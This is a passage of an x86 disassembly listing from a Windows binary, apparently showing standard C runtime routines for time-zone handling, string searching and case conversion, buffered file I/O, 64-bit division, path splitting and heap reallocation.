; Attributes: bp-based frame
sub_419597 proc near ; CODE XREF: sub_407B48+17D�p
TimeZoneInformation= _TIME_ZONE_INFORMATION ptr -0CCh
var_20 = word ptr -20h
var_1E = word ptr -1Eh
var_1A = word ptr -1Ah
var_18 = word ptr -18h
var_16 = word ptr -16h
SystemTime = _SYSTEMTIME ptr -10h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0CCh
lea eax, [ebp+SystemTime]
push eax ; lpSystemTime
call GetLocalTime ; GetLocalTime
lea eax, [ebp+var_20]
push eax ; lpSystemTime
call GetSystemTime ; GetSystemTime
mov ax, [ebp+var_16]
cmp ax, word ptr byte_445EDC+0D43DEh
jnz short loc_4195FC
mov ax, [ebp+var_18]
cmp ax, word ptr byte_445EDC+0D43DCh
jnz short loc_4195FC
mov ax, [ebp+var_1A]
cmp ax, word ptr byte_445EDC+0D43DAh
jnz short loc_4195FC
mov ax, [ebp+var_1E]
cmp ax, word ptr byte_445EDC+0D43D6h
jnz short loc_4195FC
mov ax, [ebp+var_20]
cmp ax, word ptr byte_445EDC+0D43D4h
jnz short loc_4195FC
mov eax, dword ptr byte_445EDC+0D43CCh
jmp short loc_419641
; ---------------------------------------------------------------------------
loc_4195FC: ; CODE XREF: sub_419597+28�j
; sub_419597+35�j ...
lea eax, [ebp+TimeZoneInformation]
push eax ; lpTimeZoneInformation
call GetTimeZoneInformation ; GetTimeZoneInformation
cmp eax, 0FFFFFFFFh
jz short loc_419629
cmp eax, 2
jnz short loc_419625
cmp [ebp+TimeZoneInformation.DaylightDate.wMonth], 0
jz short loc_419625
cmp [ebp+TimeZoneInformation.DaylightBias], 0
jz short loc_419625
push 1
pop eax
jmp short loc_41962C
; ---------------------------------------------------------------------------
loc_419625: ; CODE XREF: sub_419597+7A�j
; sub_419597+81�j ...
xor eax, eax
jmp short loc_41962C
; ---------------------------------------------------------------------------
loc_419629: ; CODE XREF: sub_419597+75�j
or eax, 0FFFFFFFFh
loc_41962C: ; CODE XREF: sub_419597+8C�j
; sub_419597+90�j
push esi
push edi
lea esi, [ebp+var_20]
mov edi, 51A2B0h
movsd
movsd
movsd
movsd
pop edi
mov dword ptr byte_445EDC+0D43CCh, eax
pop esi
loc_419641: ; CODE XREF: sub_419597+63�j
push eax
movzx eax, [ebp+SystemTime.wSecond]
push eax
movzx eax, [ebp+SystemTime.wMinute]
push eax
movzx eax, [ebp+SystemTime.wHour]
push eax
movzx eax, [ebp+SystemTime.wDay]
push eax
movzx eax, [ebp+SystemTime.wMonth]
push eax
movzx eax, [ebp+SystemTime.wYear]
push eax
call sub_41ED4D
mov ecx, [ebp+arg_0]
add esp, 1Ch
test ecx, ecx
jz short locret_419671
mov [ecx], eax
locret_419671: ; CODE XREF: sub_419597+D6�j
leave
retn
sub_419597 endp
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_419690
loc_419680: ; CODE XREF: sub_419690+1D�j
lea eax, [edx-1]
pop ebx
retn
; END OF FUNCTION CHUNK FOR sub_419690
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_419690 proc near ; CODE XREF: sub_409577+D9�p
; sub_40E658+32�p ...
arg_0 = dword ptr 4
arg_4 = byte ptr 8
; FUNCTION CHUNK AT 00419680 SIZE 00000005 BYTES
xor eax, eax
mov al, [esp+arg_4]
loc_419696: ; CODE XREF: sub_417F60+6E�j
push ebx
mov ebx, eax
shl eax, 8
mov edx, [esp+4+arg_0]
test edx, 3
jz short loc_4196BB
loc_4196A8: ; CODE XREF: sub_419690+29�j
mov cl, [edx]
inc edx
cmp cl, bl
jz short loc_419680
test cl, cl
jz short loc_419704
test edx, 3
jnz short loc_4196A8
loc_4196BB: ; CODE XREF: sub_419690+16�j
or ebx, eax
push edi
mov eax, ebx
shl ebx, 10h
push esi
or ebx, eax
loc_4196C6: ; CODE XREF: sub_419690+61�j
; sub_419690+70�j ...
mov ecx, [edx]
mov edi, 7EFEFEFFh
mov eax, ecx
mov esi, edi
xor ecx, ebx
add esi, eax
add edi, ecx
xor ecx, 0FFFFFFFFh
xor eax, 0FFFFFFFFh
xor ecx, edi
xor eax, esi
add edx, 4
and ecx, 81010100h
jnz short loc_419708
and eax, 81010100h
jz short loc_4196C6
and eax, 1010100h
jnz short loc_419702
and esi, 80000000h
jnz short loc_4196C6
loc_419702: ; CODE XREF: sub_419690+68�j
; sub_419690+81�j ...
pop esi
pop edi
loc_419704: ; CODE XREF: sub_419690+21�j
pop ebx
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_419708: ; CODE XREF: sub_419690+5A�j
mov eax, [edx-4]
cmp al, bl
jz short loc_419745
test al, al
jz short loc_419702
cmp ah, bl
jz short loc_41973E
test ah, ah
jz short loc_419702
shr eax, 10h
cmp al, bl
jz short loc_419737
test al, al
jz short loc_419702
cmp ah, bl
jz short loc_419730
test ah, ah
jz short loc_419702
jmp short loc_4196C6
; ---------------------------------------------------------------------------
loc_419730: ; CODE XREF: sub_419690+98�j
pop esi
pop edi
lea eax, [edx-1]
pop ebx
retn
; ---------------------------------------------------------------------------
loc_419737: ; CODE XREF: sub_419690+90�j
lea eax, [edx-2]
pop esi
pop edi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_41973E: ; CODE XREF: sub_419690+85�j
lea eax, [edx-3]
pop esi
pop edi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_419745: ; CODE XREF: sub_419690+7D�j
lea eax, [edx-4]
pop esi
pop edi
pop ebx
retn
sub_419690 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41974C proc near ; CODE XREF: sub_409577+C6�p
; sub_40FCA3+4A6D�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
cmp [ebp+arg_4], 0
push ebx
mov ebx, [ebp+arg_0]
push edi
mov edi, ebx
jg short loc_419760
xor eax, eax
jmp short loc_419796
; ---------------------------------------------------------------------------
loc_419760: ; CODE XREF: sub_41974C+E�j
dec [ebp+arg_4]
push esi
jz short loc_419790
mov esi, [ebp+arg_8]
loc_419769: ; CODE XREF: sub_41974C+42�j
dec dword ptr [esi+4]
js short loc_419778
mov ecx, [esi]
movzx eax, byte ptr [ecx]
inc ecx
mov [esi], ecx
jmp short loc_41977F
; ---------------------------------------------------------------------------
loc_419778: ; CODE XREF: sub_41974C+20�j
push esi
call sub_41E651
pop ecx
loc_41977F: ; CODE XREF: sub_41974C+2A�j
cmp eax, 0FFFFFFFFh
jz short loc_41979A
mov [edi], al
inc edi
cmp al, 0Ah
jz short loc_419790
dec [ebp+arg_4]
jnz short loc_419769
loc_419790: ; CODE XREF: sub_41974C+18�j
; sub_41974C+3D�j ...
and byte ptr [edi], 0
loc_419793: ; CODE XREF: sub_41974C+55�j
mov eax, ebx
pop esi
loc_419796: ; CODE XREF: sub_41974C+12�j
pop edi
pop ebx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_41979A: ; CODE XREF: sub_41974C+36�j
cmp edi, [ebp+arg_0]
jnz short loc_419790
xor ebx, ebx
jmp short loc_419793
sub_41974C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_4197A3(LPCSTR lpMultiByteStr)
sub_4197A3 proc near ; CODE XREF: sub_409B62+BF�p
; sub_409B62+12C�p ...
lpMem = dword ptr -4
lpMultiByteStr = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov eax, dword ptr byte_445EDC+0D4474h
push ebx
xor ebx, ebx
cmp eax, ebx
mov [ebp+lpMem], ebx
jnz short loc_4197D7
mov eax, [ebp+lpMultiByteStr]
mov edx, eax
cmp [eax], bl
jz short loc_41983E
loc_4197BF: ; CODE XREF: sub_4197A3+30�j
mov cl, [edx]
cmp cl, 61h
jl short loc_4197D0
cmp cl, 7Ah
jg short loc_4197D0
sub cl, 20h
mov [edx], cl
loc_4197D0: ; CODE XREF: sub_4197A3+21�j
; sub_4197A3+26�j
inc edx
cmp [edx], bl
jnz short loc_4197BF
jmp short loc_41983E
; ---------------------------------------------------------------------------
loc_4197D7: ; CODE XREF: sub_4197A3+11�j
push esi
push edi
push 1 ; int
push ebx ; CodePage
push ebx ; cchDest
push ebx ; lpDestStr
push 0FFFFFFFFh ; cbMultiByte
mov esi, 200h
push [ebp+lpMultiByteStr] ; lpMultiByteStr
push esi ; dwMapFlags
push eax ; Locale
call sub_41EE0F
mov edi, eax
add esp, 20h
cmp edi, ebx
jz short loc_419830
push edi
call sub_418175
cmp eax, ebx
pop ecx
mov [ebp+lpMem], eax
jz short loc_419830
push 1 ; int
push ebx ; CodePage
push edi ; cchDest
push eax ; lpDestStr
push 0FFFFFFFFh ; cbMultiByte
push [ebp+lpMultiByteStr] ; lpMultiByteStr
push esi ; dwMapFlags
push dword ptr byte_445EDC+0D4474h ; Locale
call sub_41EE0F
add esp, 20h
test eax, eax
jz short loc_419830
push [ebp+lpMem]
push [ebp+lpMultiByteStr]
call sub_417FE0
pop ecx
pop ecx
loc_419830: ; CODE XREF: sub_4197A3+53�j
; sub_4197A3+61�j ...
push [ebp+lpMem] ; lpMem
call sub_418227
mov eax, [ebp+lpMultiByteStr]
pop ecx
pop edi
pop esi
loc_41983E: ; CODE XREF: sub_4197A3+1A�j
; sub_4197A3+32�j
pop ebx
leave
retn
sub_4197A3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_419841(WORD MultiByteStr)
sub_419841 proc near ; CODE XREF: sub_40B295+6�p
; sub_40B2B3+48�p ...
DestStr = byte ptr -4
var_3 = byte ptr -3
MultiByteStr = word ptr 8
push ebp
mov ebp, esp
push ecx
cmp dword ptr byte_445EDC+0D4474h, 0
push ebx
push esi
push edi
jnz short loc_41986E
mov eax, dword ptr [ebp+MultiByteStr]
cmp eax, 41h
jl loc_419907
cmp eax, 5Ah
jg loc_419907
add eax, 20h
jmp loc_419907
; ---------------------------------------------------------------------------
loc_41986E: ; CODE XREF: sub_419841+E�j
mov ebx, dword ptr [ebp+MultiByteStr]
mov edi, 100h
push 1
cmp ebx, edi
pop esi
jge short loc_4198A2
cmp cbMultiByte, esi
jle short loc_419890
push esi ; int
push ebx ; CharType
call sub_41ADC4
pop ecx
pop ecx
jmp short loc_41989A
; ---------------------------------------------------------------------------
loc_419890: ; CODE XREF: sub_419841+42�j
mov eax, dword_43DD30
mov al, [eax+ebx*2]
and eax, esi
loc_41989A: ; CODE XREF: sub_419841+4D�j
test eax, eax
jnz short loc_4198A2
loc_41989E: ; CODE XREF: sub_419841+AD�j
mov eax, ebx
jmp short loc_419907
; ---------------------------------------------------------------------------
loc_4198A2: ; CODE XREF: sub_419841+3A�j
; sub_419841+5B�j
mov edx, dword_43DD30
mov eax, ebx
sar eax, 8
movzx ecx, al
test byte ptr [edx+ecx*2+1], 80h
jz short loc_4198C6
and byte ptr [ebp+0Ah], 0
push 2
mov byte ptr [ebp+MultiByteStr], al
mov byte ptr [ebp+MultiByteStr+1], bl
pop eax
jmp short loc_4198CF
; ---------------------------------------------------------------------------
loc_4198C6: ; CODE XREF: sub_419841+74�j
and byte ptr [ebp+MultiByteStr+1], 0
mov byte ptr [ebp+MultiByteStr], bl
mov eax, esi
loc_4198CF: ; CODE XREF: sub_419841+83�j
push esi ; int
push 0 ; CodePage
lea ecx, [ebp+DestStr]
push 3 ; cchDest
push ecx ; lpDestStr
push eax ; cbMultiByte
lea eax, [ebp+MultiByteStr]
push eax ; lpMultiByteStr
push edi ; dwMapFlags
push dword ptr byte_445EDC+0D4474h ; Locale
call sub_41EE0F
add esp, 20h
test eax, eax
jz short loc_41989E
cmp eax, esi
jnz short loc_4198FA
movzx eax, [ebp+DestStr]
jmp short loc_419907
; ---------------------------------------------------------------------------
loc_4198FA: ; CODE XREF: sub_419841+B1�j
movzx eax, [ebp+var_3]
movzx ecx, [ebp+DestStr]
shl eax, 8
or eax, ecx
loc_419907: ; CODE XREF: sub_419841+16�j
; sub_419841+1F�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_419841 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_41990C(LPCVOID lpBuffer, int, int, int)
sub_41990C proc near ; CODE XREF: sub_40BAB1+204�p
; sub_40BAB1+2B5�p ...
var_4 = dword ptr -4
lpBuffer = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov edi, [ebp+arg_4]
imul edi, [ebp+arg_8]
mov eax, [ebp+lpBuffer]
mov [ebp+var_4], edi
test edi, edi
mov [ebp+lpBuffer], eax
mov ebx, edi
jnz short loc_419930
xor eax, eax
jmp loc_4199FD
; ---------------------------------------------------------------------------
loc_419930: ; CODE XREF: sub_41990C+1B�j
mov esi, [ebp+arg_C]
test word ptr [esi+0Ch], 10Ch
jz short loc_419943
mov eax, [esi+18h]
mov [ebp+arg_C], eax
jmp short loc_41994A
; ---------------------------------------------------------------------------
loc_419943: ; CODE XREF: sub_41990C+2D�j
mov [ebp+arg_C], 1000h
loc_41994A: ; CODE XREF: sub_41990C+35�j
; sub_41990C+E8�j
mov ecx, [esi+0Ch]
and ecx, 108h
jz short loc_41997E
mov eax, [esi+4]
test eax, eax
jz short loc_41997E
cmp ebx, eax
mov edi, ebx
jb short loc_419964
mov edi, eax
loc_419964: ; CODE XREF: sub_41990C+54�j
push edi
push [ebp+lpBuffer]
push dword ptr [esi]
call sub_417A40
sub [esi+4], edi
add [esi], edi
add esp, 0Ch
sub ebx, edi
add [ebp+lpBuffer], edi
jmp short loc_4199C4
; ---------------------------------------------------------------------------
loc_41997E: ; CODE XREF: sub_41990C+47�j
; sub_41990C+4E�j
cmp ebx, [ebp+arg_C]
jb short loc_4199C9
test ecx, ecx
jz short loc_419992
push esi
call sub_41E57F
test eax, eax
pop ecx
jnz short loc_419A0B
loc_419992: ; CODE XREF: sub_41990C+79�j
cmp [ebp+arg_C], 0
jz short loc_4199A5
mov eax, ebx
xor edx, edx
div [ebp+arg_C]
mov edi, ebx
sub edi, edx
jmp short loc_4199A7
; ---------------------------------------------------------------------------
loc_4199A5: ; CODE XREF: sub_41990C+8A�j
mov edi, ebx
loc_4199A7: ; CODE XREF: sub_41990C+97�j
push edi ; nNumberOfBytesToWrite
push [ebp+lpBuffer] ; lpBuffer
push dword ptr [esi+10h] ; int
call sub_41F033
add esp, 0Ch
cmp eax, 0FFFFFFFFh
jz short loc_419A02
add [ebp+lpBuffer], eax
sub ebx, eax
cmp eax, edi
jb short loc_419A02
loc_4199C4: ; CODE XREF: sub_41990C+70�j
mov edi, [ebp+var_4]
jmp short loc_4199F2
; ---------------------------------------------------------------------------
loc_4199C9: ; CODE XREF: sub_41990C+75�j
mov eax, [ebp+lpBuffer]
push esi ; int
movsx eax, byte ptr [eax]
push eax ; Buffer
call sub_41A4A5
pop ecx
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_419A0B
inc [ebp+lpBuffer]
mov eax, [esi+18h]
dec ebx
mov [ebp+arg_C], eax
test eax, eax
jg short loc_4199F2
mov [ebp+arg_C], 1
loc_4199F2: ; CODE XREF: sub_41990C+BB�j
; sub_41990C+DD�j
test ebx, ebx
jnz loc_41994A
mov eax, [ebp+arg_8]
loc_4199FD: ; CODE XREF: sub_41990C+1F�j
; sub_41990C+108�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_419A02: ; CODE XREF: sub_41990C+AD�j
; sub_41990C+B6�j
or dword ptr [esi+0Ch], 20h
mov eax, [ebp+var_4]
jmp short loc_419A0D
; ---------------------------------------------------------------------------
loc_419A0B: ; CODE XREF: sub_41990C+84�j
; sub_41990C+CF�j
mov eax, edi
loc_419A0D: ; CODE XREF: sub_41990C+FD�j
sub eax, ebx
xor edx, edx
div [ebp+arg_4]
jmp short loc_4199FD
sub_41990C endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_419A20 proc near ; CODE XREF: sub_40C308+3D�p
; sub_40DB83+2D�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push ebx
mov eax, [esp+4+arg_C]
or eax, eax
jnz short loc_419A41
mov ecx, [esp+4+arg_8]
mov eax, [esp+4+arg_4]
xor edx, edx
div ecx
mov eax, [esp+4+arg_0]
div ecx
mov eax, edx
xor edx, edx
jmp short loc_419A91
; ---------------------------------------------------------------------------
loc_419A41: ; CODE XREF: sub_419A20+7�j
mov ecx, eax
mov ebx, [esp+4+arg_8]
mov edx, [esp+4+arg_4]
mov eax, [esp+4+arg_0]
loc_419A4F: ; CODE XREF: sub_419A20+39�j
shr ecx, 1
rcr ebx, 1
shr edx, 1
rcr eax, 1
or ecx, ecx
jnz short loc_419A4F
div ebx
mov ecx, eax
mul [esp+4+arg_C]
xchg eax, ecx
mul [esp+4+arg_8]
add edx, ecx
jb short loc_419A7A
cmp edx, [esp+4+arg_4]
ja short loc_419A7A
jb short loc_419A82
cmp eax, [esp+4+arg_0]
jbe short loc_419A82
loc_419A7A: ; CODE XREF: sub_419A20+4A�j
; sub_419A20+50�j
sub eax, [esp+4+arg_8]
sbb edx, [esp+4+arg_C]
loc_419A82: ; CODE XREF: sub_419A20+52�j
; sub_419A20+58�j
sub eax, [esp+4+arg_0]
sbb edx, [esp+4+arg_4]
neg edx
neg eax
sbb edx, 0
loc_419A91: ; CODE XREF: sub_419A20+1F�j
pop ebx
retn 10h
sub_419A20 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_419AA0 proc near ; CODE XREF: sub_40C308+24�p
; sub_40DB83+3F�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push ebx
push esi
mov eax, [esp+8+arg_C]
or eax, eax
jnz short loc_419AC2
mov ecx, [esp+8+arg_8]
mov eax, [esp+8+arg_4]
xor edx, edx
div ecx
mov ebx, eax
mov eax, [esp+8+arg_0]
div ecx
mov edx, ebx
jmp short loc_419B03
; ---------------------------------------------------------------------------
loc_419AC2: ; CODE XREF: sub_419AA0+8�j
mov ecx, eax
mov ebx, [esp+8+arg_8]
mov edx, [esp+8+arg_4]
mov eax, [esp+8+arg_0]
loc_419AD0: ; CODE XREF: sub_419AA0+3A�j
shr ecx, 1
rcr ebx, 1
shr edx, 1
rcr eax, 1
or ecx, ecx
jnz short loc_419AD0
div ebx
mov esi, eax
mul [esp+8+arg_C]
mov ecx, eax
mov eax, [esp+8+arg_8]
mul esi
add edx, ecx
jb short loc_419AFE
cmp edx, [esp+8+arg_4]
ja short loc_419AFE
jb short loc_419AFF
cmp eax, [esp+8+arg_0]
jbe short loc_419AFF
loc_419AFE: ; CODE XREF: sub_419AA0+4E�j
; sub_419AA0+54�j
dec esi
loc_419AFF: ; CODE XREF: sub_419AA0+56�j
; sub_419AA0+5C�j
xor edx, edx
mov eax, esi
loc_419B03: ; CODE XREF: sub_419AA0+20�j
pop esi
pop ebx
retn 10h
sub_419AA0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419B08 proc near ; CODE XREF: sub_40C3BE+1E3�p
; sub_40F1EA+107�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
push ebx
mov ebx, [ebp+arg_0]
push esi
push edi
push ebx
call sub_4180D0
cmp eax, 1
pop ecx
jb short loc_419B43
cmp byte ptr [ebx+1], 3Ah
jnz short loc_419B43
mov esi, [ebp+arg_4]
test esi, esi
jz short loc_419B3F
push 2
push ebx
push esi
call sub_41F5C0
add esp, 0Ch
and byte ptr [esi+2], 0
loc_419B3F: ; CODE XREF: sub_419B08+25�j
inc ebx
inc ebx
jmp short loc_419B4D
; ---------------------------------------------------------------------------
loc_419B43: ; CODE XREF: sub_419B08+18�j
; sub_419B08+1E�j
mov eax, [ebp+arg_4]
test eax, eax
jz short loc_419B4D
and byte ptr [eax], 0
loc_419B4D: ; CODE XREF: sub_419B08+39�j
; sub_419B08+40�j
and [ebp+arg_4], 0
cmp byte ptr [ebx], 0
mov eax, ebx
mov esi, 0FFh
mov [ebp+arg_0], eax
jz short loc_419BC5
loc_419B60: ; CODE XREF: sub_419B08+87�j
mov cl, [eax]
movzx edx, cl
test byte ptr [edx+51B6E1h], 4
jz short loc_419B71
inc eax
jmp short loc_419B8B
; ---------------------------------------------------------------------------
loc_419B71: ; CODE XREF: sub_419B08+64�j
cmp cl, 2Fh
jz short loc_419B85
cmp cl, 5Ch
jz short loc_419B85
cmp cl, 2Eh
jnz short loc_419B8B
mov [ebp+var_4], eax
jmp short loc_419B8B
; ---------------------------------------------------------------------------
loc_419B85: ; CODE XREF: sub_419B08+6C�j
; sub_419B08+71�j
lea ecx, [eax+1]
mov [ebp+arg_4], ecx
loc_419B8B: ; CODE XREF: sub_419B08+67�j
; sub_419B08+76�j ...
inc eax
cmp byte ptr [eax], 0
jnz short loc_419B60
mov edi, [ebp+arg_4]
mov [ebp+arg_0], eax
test edi, edi
jz short loc_419BC5
cmp [ebp+arg_8], 0
jz short loc_419BC0
sub edi, ebx
cmp edi, esi
jb short loc_419BA9
mov edi, esi
loc_419BA9: ; CODE XREF: sub_419B08+9D�j
push edi
push ebx
push [ebp+arg_8]
call sub_41F5C0
mov eax, [ebp+arg_8]
add esp, 0Ch
and byte ptr [edi+eax], 0
mov eax, [ebp+arg_0]
loc_419BC0: ; CODE XREF: sub_419B08+97�j
mov ebx, [ebp+arg_4]
jmp short loc_419BCF
; ---------------------------------------------------------------------------
loc_419BC5: ; CODE XREF: sub_419B08+56�j
; sub_419B08+91�j
mov ecx, [ebp+arg_8]
test ecx, ecx
jz short loc_419BCF
and byte ptr [ecx], 0
loc_419BCF: ; CODE XREF: sub_419B08+BB�j
; sub_419B08+C2�j
mov edi, [ebp+var_4]
test edi, edi
jz short loc_419C22
cmp edi, ebx
jb short loc_419C22
cmp [ebp+arg_C], 0
jz short loc_419BFF
sub edi, ebx
cmp edi, esi
jb short loc_419BE8
mov edi, esi
loc_419BE8: ; CODE XREF: sub_419B08+DC�j
push edi
push ebx
push [ebp+arg_C]
call sub_41F5C0
mov eax, [ebp+arg_C]
add esp, 0Ch
and byte ptr [edi+eax], 0
mov eax, [ebp+arg_0]
loc_419BFF: ; CODE XREF: sub_419B08+D6�j
mov edi, [ebp+arg_10]
test edi, edi
jz short loc_419C4A
sub eax, [ebp+var_4]
cmp eax, esi
jnb short loc_419C0F
mov esi, eax
loc_419C0F: ; CODE XREF: sub_419B08+103�j
push esi
push [ebp+var_4]
push edi
call sub_41F5C0
add esp, 0Ch
and byte ptr [esi+edi], 0
jmp short loc_419C4A
; ---------------------------------------------------------------------------
loc_419C22: ; CODE XREF: sub_419B08+CC�j
; sub_419B08+D0�j
mov edi, [ebp+arg_C]
test edi, edi
jz short loc_419C40
sub eax, ebx
cmp eax, esi
jnb short loc_419C31
mov esi, eax
loc_419C31: ; CODE XREF: sub_419B08+125�j
push esi
push ebx
push edi
call sub_41F5C0
add esp, 0Ch
and byte ptr [esi+edi], 0
loc_419C40: ; CODE XREF: sub_419B08+11F�j
mov eax, [ebp+arg_10]
test eax, eax
jz short loc_419C4A
and byte ptr [eax], 0
loc_419C4A: ; CODE XREF: sub_419B08+FC�j
; sub_419B08+118�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_419B08 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419C4F proc near ; CODE XREF: sub_40CB7C+19�p
; sub_40E190+1C�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 20h
mov eax, [ebp+arg_0]
push esi
push [ebp+arg_C]
mov [ebp+var_18], eax
mov [ebp+var_20], eax
mov eax, [ebp+arg_4]
push [ebp+arg_8]
mov [ebp+var_1C], eax
lea eax, [ebp+var_20]
mov [ebp+var_14], 42h
push eax
call sub_41A5BA
add esp, 0Ch
dec [ebp+var_1C]
mov esi, eax
js short loc_419C8D
mov eax, [ebp+var_20]
and byte ptr [eax], 0
jmp short loc_419C9A
; ---------------------------------------------------------------------------
loc_419C8D: ; CODE XREF: sub_419C4F+34�j
lea eax, [ebp+var_20]
push eax ; int
push 0 ; Buffer
call sub_41A4A5
pop ecx
pop ecx
loc_419C9A: ; CODE XREF: sub_419C4F+3C�j
mov eax, esi
pop esi
leave
retn
sub_419C4F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_419C9F(LPVOID lpMem, SIZE_T dwBytes)
sub_419C9F proc near ; CODE XREF: sub_40CDD9+2C�p
; sub_418BF3+35�p ...
var_4 = dword ptr -4
lpMem = dword ptr 8
dwBytes = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
cmp [ebp+lpMem], 0
push ebx
push esi
push edi
jnz short loc_419CBA
push [ebp+dwBytes]
call sub_418175
pop ecx
jmp loc_419F3A
; ---------------------------------------------------------------------------
loc_419CBA: ; CODE XREF: sub_419C9F+B�j
mov esi, [ebp+dwBytes]
test esi, esi
jnz short loc_419CCF
push [ebp+lpMem] ; lpMem
call sub_418227
pop ecx
jmp loc_419F38
; ---------------------------------------------------------------------------
loc_419CCF: ; CODE XREF: sub_419C9F+20�j
mov eax, dword ptr byte_445EDC+0D5A48h
cmp eax, 3
jnz loc_419DDF
loc_419CDD: ; CODE XREF: sub_419C9F+12E�j
xor edi, edi
cmp esi, 0FFFFFFE0h
ja loc_419DBB
push [ebp+lpMem]
call sub_41B06E
mov ebx, eax
pop ecx
test ebx, ebx
jz loc_419D96
cmp esi, dword ptr byte_445EDC+0D5A40h
ja short loc_419D4F
mov edi, [ebp+lpMem]
push esi
push edi
push ebx
call sub_41B877
add esp, 0Ch
test eax, eax
jnz short loc_419D4B
push esi
call sub_41B3C2
mov edi, eax
pop ecx
test edi, edi
jz short loc_419D4F
mov ebx, [ebp+lpMem]
mov eax, [ebx-4]
dec eax
cmp eax, esi
jb short loc_419D2F
mov eax, esi
loc_419D2F: ; CODE XREF: sub_419C9F+8C�j
push eax
push ebx
push edi
call sub_417A40
push ebx
call sub_41B06E
push [ebp+lpMem]
mov ebx, eax
push ebx
call sub_41B099
add esp, 18h
loc_419D4B: ; CODE XREF: sub_419C9F+74�j
test edi, edi
jnz short loc_419D92
loc_419D4F: ; CODE XREF: sub_419C9F+62�j
; sub_419C9F+81�j
test esi, esi
jnz short loc_419D56
push 1
pop esi
loc_419D56: ; CODE XREF: sub_419C9F+B2�j
add esi, 0Fh
and esi, 0FFFFFFF0h
push esi ; dwBytes
push 0 ; dwFlags
push dword ptr byte_445EDC+0D5A44h ; hHeap
call HeapAlloc
mov edi, eax
test edi, edi
jz short loc_419D92
mov ecx, [ebp+lpMem]
mov eax, [ecx-4]
dec eax
cmp eax, esi
jb short loc_419D7E
mov eax, esi
loc_419D7E: ; CODE XREF: sub_419C9F+DB�j
push eax
push ecx
push edi
call sub_417A40
push [ebp+lpMem]
push ebx
call sub_41B099
add esp, 14h
loc_419D92: ; CODE XREF: sub_419C9F+AE�j
; sub_419C9F+D0�j
test ebx, ebx
jnz short loc_419DB7
loc_419D96: ; CODE XREF: sub_419C9F+56�j
test esi, esi
jnz short loc_419D9D
push 1
pop esi
loc_419D9D: ; CODE XREF: sub_419C9F+F9�j
add esi, 0Fh
and esi, 0FFFFFFF0h
push esi ; dwBytes
push [ebp+lpMem] ; lpMem
push 0 ; dwFlags
push dword ptr byte_445EDC+0D5A44h ; hHeap
call HeapReAlloc
mov edi, eax
loc_419DB7: ; CODE XREF: sub_419C9F+F5�j
test edi, edi
jnz short loc_419DD8
loc_419DBB: ; CODE XREF: sub_419C9F+43�j
cmp dword ptr byte_445EDC+0D443Ch, 0
jz short loc_419DD8
push esi
call sub_41AE39
test eax, eax
pop ecx
jnz loc_419CDD
jmp loc_419F38
; ---------------------------------------------------------------------------
loc_419DD8: ; CODE XREF: sub_419C9F+11A�j
; sub_419C9F+123�j ...
mov eax, edi
jmp loc_419F3A
; ---------------------------------------------------------------------------
loc_419DDF: ; CODE XREF: sub_419C9F+38�j
cmp eax, 2
jnz loc_419EFA
cmp esi, 0FFFFFFE0h
ja short loc_419DFC
test esi, esi
jbe short loc_419DF9
add esi, 0Fh
and esi, 0FFFFFFF0h
jmp short loc_419DFC
; ---------------------------------------------------------------------------
loc_419DF9: ; CODE XREF: sub_419C9F+150�j
push 10h
pop esi
loc_419DFC: ; CODE XREF: sub_419C9F+14C�j
; sub_419C9F+158�j ...
xor edi, edi
cmp esi, 0FFFFFFE0h
ja loc_419EDC
lea eax, [ebp+dwBytes]
push eax
lea eax, [ebp+var_4]
push eax
push [ebp+lpMem]
call sub_41BDC9
mov ebx, eax
add esp, 0Ch
test ebx, ebx
jz loc_419EC0
cmp esi, dword_43FF74
jnb short loc_419E84
mov edi, esi
shr edi, 4
push edi
push ebx
push [ebp+dwBytes]
push [ebp+var_4]
call sub_41C191
add esp, 10h
test eax, eax
jz short loc_419E4A
mov edi, [ebp+lpMem]
jmp short loc_419E7C
; ---------------------------------------------------------------------------
loc_419E4A: ; CODE XREF: sub_419C9F+1A4�j
push edi
call sub_41BE65
mov edi, eax
pop ecx
test edi, edi
jz short loc_419E84
movzx eax, byte ptr [ebx]
